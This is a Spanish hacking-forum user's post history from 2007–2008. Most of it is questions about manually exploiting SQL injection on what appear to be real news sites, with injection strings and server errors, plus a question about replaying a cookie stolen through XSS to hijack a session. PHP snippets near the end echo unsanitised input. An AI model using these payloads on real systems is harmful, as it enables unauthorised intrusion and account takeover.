Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Leber

#41
Nivel Web / Re: Duda con SQL injection
22 Abril 2008, 01:08 AM
Heme aqui de nuevo ( ¿que desgracia eh  :( ?)

Bueno, vamos a ver:

Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice:

id=456+having+1=1

Y me produjo el siguiente error:

[La columna 'noticias.ANTETITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY./code]

Asi que luego hice:

id=456+group+by+noticias.ANTETITULO+having+1=1

Y me salio:

[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'noticias.TITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

/web/sp/index.asp, line 11


Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia:


id=456+group+by+noticias.ANTETITULO+,noticias.TITULO+,noticias.ENTRADILLA+,noticias.FECHA+,noticias.HEAD,+noticias.TEXTO+having+1=1--


Me produjo el siguiente error:

[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.

Y ahi me quede, intente sacar la version con

id=456+union+select+@@version,1,1,1,1

Y me dijo:

[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor varchar 'Cinco organizaciones ecologistas denuncian la especulación urbanística como la principal amenaza del medio ambiente en España' para una columna de tipo de datos int.

Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes.

Gracias de antemano, y un saludo

[/code]
#42
Nivel Web / Re: Duda con SQL injection
20 Abril 2008, 02:01 AM
Es decir, que si la v. es menor que 5, tengo que ir probando a meterle sentencias SQL para descubrir algo no?

Por que por ejemlo, hago:

id=-1'+ORDER+BY+1/* y me dice que se desconoce esa columna, en cambio con otras si que funciono, y a partir de 17 ya me decian que no se conocia esa columna, pero de 1 a 16 no me decia nada..

O por ejemplo, si hago esto:

id=1'+UNION+ALL+SELECT+1+FROM+noticias/*

Me salta:

1222 The used SELECT statements have a different number of columns

Y si en cambio le voy metiendo hasta llegar al 17:
id='+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+noticias/*

Me devuelve un error de sintaxi:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+noticias

Tambien probe con:

id=-1'+UNION+ALL+SELECT+1+FROM+usuarios/*

Pero nada, no existe la tabla(lastima jeje):

1146 Table 'diariosi_ds21.usuarios' doesn't exist


No se, tendre que ir probando cosas...

Bueno, vere a ver que puede hacerse, aunque de momento no voy muy bien encaminado, ya te digo, creo que logro sacar el nº  de columnas pero no ningun nombre de tabla, y bueno, eso que he ido mirando manuales de referencia y lo intento adecuar pero nada, como si le entrara cosas feas que no le gustasen un pelo... Si tienes algun manual asi bien detallado o que empiezen desde 0 te lo agradeceria sino, gracias igualmente, suficiente me has explicado ya jeje.

Saludos, y gracias.
#43
Nivel Web / Re: Duda con SQL injection
19 Abril 2008, 20:21 PM
Muchas gracias a ambos, y gracias por el PDF,(ya lo lei jeje)  pero aun no me "salgo" con la mia. Estoy probando con una pagina con Mysql ya que es con lo que estoy mas familiriarizado, pero no logro avanzar. Les explico:

Bueno, supongo que la pagina ejecuta la accion(nuestra accion) porque la " ' " significa una interrupcion de la sentencia suya, y nos permite lanzar la nuestra.

Pero no se como empezar a sacarle el jugo, he visto varios manuales sobre inyecciones como lo hacian y parecia facil, pero debo ser borrico...

El problema esque no se por donde cogerlo, en alguna pagina me he ido guiando por los errores que me salian, por ejemplo para determinar el nº de columnas, y cuando me salia "Columna fuera de rango" en ingles, pues ya sabia que no habia mas columnas, y luego, he tratado de listar las columnas "buenas" con UNION ALL SELECT 1,2,3 etc, FROM nombre_tabla, pero no habia suerte, salia error, pero no de sintaxi, como si no reconociera el nº de columnas... Quiza doy demasiado la tabarra... A ver si pueden echarme un cable, me he leido como 4,5 manuales pero no logro ponerlo en practica de verdad, es decir, logro llegar hasta cierto punto(como determinar el num de columnas) pero nada mas.

Gracias de antemano y saludos
#44
Nivel Web / Re: Duda con SQL injection
18 Abril 2008, 11:55 AM
Si, sale el conteido con id=45 and 1=1, asi que supongo que es vulnerable. De todos modos como me recomendo Lympex leere algo sobre el MS SQL(tengo nociones basicas de SQL, pero no a tanto "nivel"), asi que gracias por la ayuda.

Si, como ya dije es curiosidad, y no quiero ninguna herramienta para "facilitarme la faena", quiero hacerlo yo solito, solo que tenia una duda, asi pues, muchas gracias.

Saludos

PD: Yo crei que SQL era standart, es decir, la sintaxi.
#45
Nivel Web / Duda con SQL injection
18 Abril 2008, 01:05 AM
Buenas, encontre una pagina vulnerable a SQL injection, pero no logro avanzar, intento sacarle cosas pero nada, a ver si pueden echarme un cable:

La pagina es tipo:

www.site.com/web/?id=45

Y si le pongo una comilla al final me salta:


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ''.

/web/sp/index.asp, line 1


Pero por mas que intento ordenarlo y hacer otras cosas me saltan errores, por ejemplo:

Poniendo la sentencia:

  480'ORDER BY 1 /*

Me salta:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres 'ORDER BY 1 /*'.

/web/sp/index.asp, line 11


A ver si pueden orientarme un poco, no quiero destruir ni nada, suficiente cuestan hacer las cosas, pero es simple curiosidad,. Gracias de antemano


#46
Nivel Web / Duda con coockies
15 Abril 2008, 15:43 PM
Buenas, mi duda es algo tonta(me da un poco de verguenza preguntarlo, pero bueno...). Habiendo logrado efectuar un "ataque" XSS contra una web, y habiendo capturado la cookie en un .txt, al verlo, me surge una duda, lo capturado es esto:

ociojoven=3524cc395279137e150d0cfa3d41ee72; ociojoven=3524cc395279137e150d0cfa3d41ee72; __utma=90072453.1255820204.1208265823.1208265823.1208265823.1; __utmb=90072453; __utmc=90072453; __utmz=90072453.1208265823.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ojname=*Tristis*Animas*; PHPSESSID=fde2ad17aa4ba2aa2d2103f50f29f798[code]

La duda es: la coockie es esto?

[code]ociojoven=3524cc395279137e150d0cfa3d41ee72


Si lo es, con un proxy interceptor de cabezeras podria modificarla y entrar con esa, cierto? (Tipo Aquiles)

Y si no lo es me podrian indicar cual es. Mi motivo no es hacer las cosas sin saber, de hecho esa coockie es mia, es decir, me lo hice a mi mismo para probar como se hacian este tipo de ataques.

Saludos y gracias de antemano[/code][/code]
#47
Nivel Web / CSRF
12 Noviembre 2007, 19:04 PM
Buenas, alguien sabe de un buen manual de CSRF, esque me lei uno y no me quedo del todo claro. Gracias de antemano
#48
PHP / Re: Inicializar contador
6 Noviembre 2007, 09:30 AM
Buenas, este es el codigo del contador solo:

Contador.php

Y aqui donde va incluido
<?php 


$fp
=fopen("cuentas.txt","r+");
$visitas=fgets($fp,7);
$visitas++;
rewind($fp);
fputs($fp,$visitas);
fclose($fp);
print 
"$visitas";
?>


Y este es el codigo de donte esta incluido, y donde quiero poner el boton para inicializarlo:


<?php

$nombre
=$_GET['nombre'];
$apellido=$_GET['apellido'];
$apellido2=$_GET['apellido2'];
$edad=$_GET['edad'];
$expe=$_GET['expe'];
$domicilio=$_GET['domicilio'];
$pais=$_GET['pais'];
$provincia=$_GET['provincia'];
$telefono=$_GET['tel'];
$lengua=array($_GET['lengua0'],$_GET['lengua1'],$_GET['lengua2'],$_GET['lengua3'],$_GET['lengua4'],$_GET['lengua5']);
$empresas=$_GET['empresas'];
$profe=$_GET['profe'];
$idiomas[]="";
$traduccion=array("Espaniol","Ingles","Frances","Catalan","Ruso","Xino");

$numelementos=count($traduccion);
print 
"Hola $nombre";
print 
"<br>";


             
      for(
$i=0;$i<=$numelementos;$i++){

       if(isset (
$lengua[$i])){

    
$idiomas[$i]=$traduccion[$i];
}

   
    
   }

    
$total=count($idiomas);
    
sort($idiomas);

      

    

print 
"<br>";

         switch(
$pais){


            case 
2:

                     
$pais="Espania"; break;

            case 
3:

                     
$pais="Francia"; break;

            case 
4:

                     
$pais="Alemania"; break;

            case 
5:

                     
$pais="Argentina"; break;

            case 
6:

                     
$pais="Russia";   break;

            case 
7:

                     
$pais="Marruecos"; break;

        }

           switch(
$provincia){


          case 
2

                      
$provincia="Barcelona"; break;

          case 
3:

                      
$provincia="Valencia"; break;

          case 
4:
             
                      
$provincia="Madrid"; break;

          case 
5

                      
$provincia="Pais Vasco"; break;

          case 
6:

                      
$provincia="La Rioja"; break;

          case 
7:

                      
$provincia="Galicia"; break;

          case 
8:

                      
$provincia="Mallorca"; break;

          case 
9:

                      
$provincia="Menorca"; break;

          case 
10:

                      
$provincia="Tenerife"; break;

          case 
11:

                      
$provincia="Zaragoza"; break;

      }

                
              switch(
$expe){

                  case 
5:

                   
$expe="1 año"; break;

                  case 
10:

                   
$expe="2 años"; break;
                   
                  case 
15:

                    
$expe="3 años"; break;

                  case 
20:

                    
$expe="Mas de 3 años"; break;

          }
      
           
        switch(
$profe){

             case 
1:

                        
$profe="Programador C/C++"; break;

             case 
2:

                        
$profe="Desarrollador en JAVA"; break;

             case 
3:

                        
$profe="Desarrollador en PHP"; break;

             case 
4:

                        
$profe="Desarrollador en C para kernels 2.4.x"; break;

             case 
5:

                        
$profe="Administrador de Redes Linux"; break;

             case 
6:

                       
$profe="Reparacion hardware para Laptops y sobremesa"; break;

            case 
7:

                       
$profe="Administrador de servicios de Internet"; break;

         }



   
?>

<html><head></head>
<body bgcolor="#000000"><font color="white" face="courier"><h2 align="center"><b>Visita:</b><?php include('contador.php');?></h2></font>
<font size=4 color="white" face="arial">Hemos recibido sus datos, verifique que estos sean correctos por favor:</font><p><font size=3 color="white" face="courier">
<b>Informacion sobre usted:</b><?php print $_SERVER['HTTP_USER_AGENT'];?><br><br>
<b>Internet Protocol:</b><?php include('ips.php');?><br><br>
<b>Nombre completo:</b> <?php print "$apellido$apellido2$nobrmbre"?><p>
<b>Edad:</b> <?php print "$edad"?><pM>
<b>Domicilio:</b> <?php print "$domicilio"?><p>
<b>Telefono:</b> <?php print "$telefono"?><p>
<b>Pais de origen:</b> <?php print "$pais"?><p>
<b>Provincia:</b> <?php print "$provincia"?><p>
<b>Experiencia laboral:</b> <?php print "$expe"?><p>
<b>Profesion elejida:</b> <?php print "$profe"?><p>
<b>Empresas en las que ha trabajado:</b> <?php print "$empresas"?><p>
<b>Idiomas hablados:</b> <?php for($i=0;$i<=$total;$i++){ print "<br>$idiomas[$i]";}?><p>
<form action="confirmacion.php" method="get">
<b>Son correctos estos datos?</b> <br><br><input type="checkbox" name="correc">Si<br>
                           <input type="checkbox" name="deneg">No<font size=2>(Si elige No, le redirigiremos a la pagina principal para que pueda efectuar los debidos cambios)</font><br><br>
                           <input type="submit" value=" Confirmar "></form>

</font></body></html>



#49
PHP / Inicializar contador
5 Noviembre 2007, 22:16 PM
Buenas señores, alla va mi duda:

El caso esque cree un contador en php, uno chorras, ya que no mira si es el mismo usuario, eso lo hare mas adelante. Pero queria poner un boton al lado, para inicializarlo yo a 0, el caso esque pensé que dandole click al boton podria llamar a una funcion en php para que me borrara las visitas, y sobreescribiera un 0 otra vez, y luego llamar a la funcion que tengo de incrementar el contador que ya tengo hecho, pero la parte de inicializarlo no me sale. Alguna sugerencia? Muchas gracias de antemano
#50
PHP / Re: Problemilla en PHP
25 Octubre 2007, 18:17 PM
Pues tienes  mucha razón y me da mucha rabia el no haberlo visto de este modo tan simple. Bueno, muchas gracias por resolverme esa duda.